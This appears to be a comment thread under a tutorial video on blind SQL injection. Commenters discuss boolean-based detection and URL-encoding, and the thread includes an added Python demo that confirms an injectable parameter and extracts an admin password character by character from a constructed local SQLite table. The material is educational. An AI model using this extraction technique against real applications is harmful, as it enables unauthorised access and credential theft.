I think a better web app for practicing blind SQL injection is bWAPP, not DVWA. This is actually a half-blind, half-union-based SQL injection example. In blind SQL injection you can't see output from the database at all. And thanks Zaid, I started learning web app pentesting from your course.
@idkk403 A year ago
Thanks, this really helped me understand the concept.
@wolf7251 4 years ago
018: You mentioned a previous example, but this is the only SQL injection video on your channel. If I missed it, could you share the link, please? Thanks
@sniperking3135 4 years ago
Please make a video on installing Metasploitable and adding it to VirtualBox.
@Brokify1 3 years ago
Just download the .ova file, double-click it and click Import. That is it, man.
@darkcheq 4 years ago
The %23 you put in the link, is that the -- symbol? And if yes, how did you find it?
@sachinmaurya3259 3 years ago
%23 is the URL-encoded value of #. It means %23 = #. As we are writing in the URL we cannot directly write the "#", therefore we have to use %23 as the URL-encoded value. Hope this helps :)
@LoneVocalist 3 years ago
I don't get it. Why not just SQL inject first anyway to see if it works or not? What did the blind injection prove?
@erobtenorio 3 years ago
This kind of technique is used when you don't have an explicit response from the server to determine whether your query was correct or not, or even interpreted; at that point you need to ask the server true and false questions in order to steal data. One method to determine if the app is vulnerable is to check the response when you ask for true and false statements, i.e. when TRUE you will receive one kind of response (a normal page, let's say), and when FALSE you will receive a different response (e.g. a page with an error). If that happens you can determine that the app is vulnerable to injection, since you are getting a response for your crafted TRUE and FALSE questions (queries). So it proves whether the app is vulnerable or not; then you can proceed with your injection methods.
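The TRUE/FALSE detection step described in the comment above, followed by the data-stealing step it leads to, as an added example that is not part of the video or of any commenter's code. It builds a constructed SQLite database with a hypothetical `users` table (the table, column names and credentials are assumptions), a hypothetical endpoint that concatenates the `id` parameter into the query and only tells you whether a row came back, and an attacker side that first confirms the injection with `1=1` / `1=2` and then recovers a column value one character at a time by binary search. SQLite comments start with `-- `, where MySQL also accepts `#` (the `%23` discussed earlier in the thread), so the payload uses `-- ` here.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data (assumption for this example, not from the video)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "admin", "s3cret!"), ("2", "alice", "hunter2")],
    )
    return conn


class BlindTarget:
    """Hypothetical vulnerable endpoint. It concatenates the id parameter into
    the query and only reports whether a row came back, so the attacker never
    sees any column value: that is what makes the injection blind."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.requests = 0  # counts requests, i.e. the cost of the attack

    def lookup(self, user_id: str) -> bool:
        self.requests += 1
        sql = f"SELECT user_id FROM users WHERE user_id = '{user_id}'"  # injectable
        try:
            row = self.conn.execute(sql).fetchone()
        except sqlite3.Error:
            return False  # a real app would show an error page: also the FALSE page
        return row is not None  # True -> "user exists" page, False -> "missing" page


def ask(target: BlindTarget, condition: str) -> bool:
    """Turn one boolean SQL condition into a yes/no answer from the target.
    The trailing '-- ' comments out the closing quote the app appends."""
    return target.lookup(f"1' AND ({condition})-- ")


def is_injectable(target: BlindTarget) -> bool:
    """The detection step: a TRUE condition must give the normal page and a
    FALSE one the other page. If both give the same page, either the input
    is not reaching SQL or the two pages do not differ, and a boolean oracle
    is not available (time-based would be the next thing to try)."""
    return ask(target, "1=1") and not ask(target, "1=2")


def extract(target: BlindTarget, subquery: str, max_len: int = 64) -> str:
    """Recover the single string returned by `subquery` one character at a
    time, with a binary search over printable ASCII for each position."""
    length = next(
        (n for n in range(1, max_len + 1) if ask(target, f"length(({subquery})) = {n}")),
        None,
    )
    if length is None:
        raise ValueError("value is NULL, empty, or longer than max_len")
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # printable ASCII code points
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(target, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    t = BlindTarget(build_db())
    print("injectable:", is_injectable(t))
    pw = extract(t, "SELECT password FROM users WHERE username = 'admin'")
    print("admin password:", pw, "recovered in", t.requests, "requests")
```

The request counter is the practical point: every character costs about seven requests here, so a real run against a network target is noisy and slow, which is why tools automate it and why a boolean oracle is preferred over a time-based one whenever the two pages actually differ.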
@unit4246 3 years ago
It's not blind SQL.
@justkiddieng6317 A year ago
I also thought that, but it is. It's called boolean-based, but it would be more practical if he used another attack like time-based.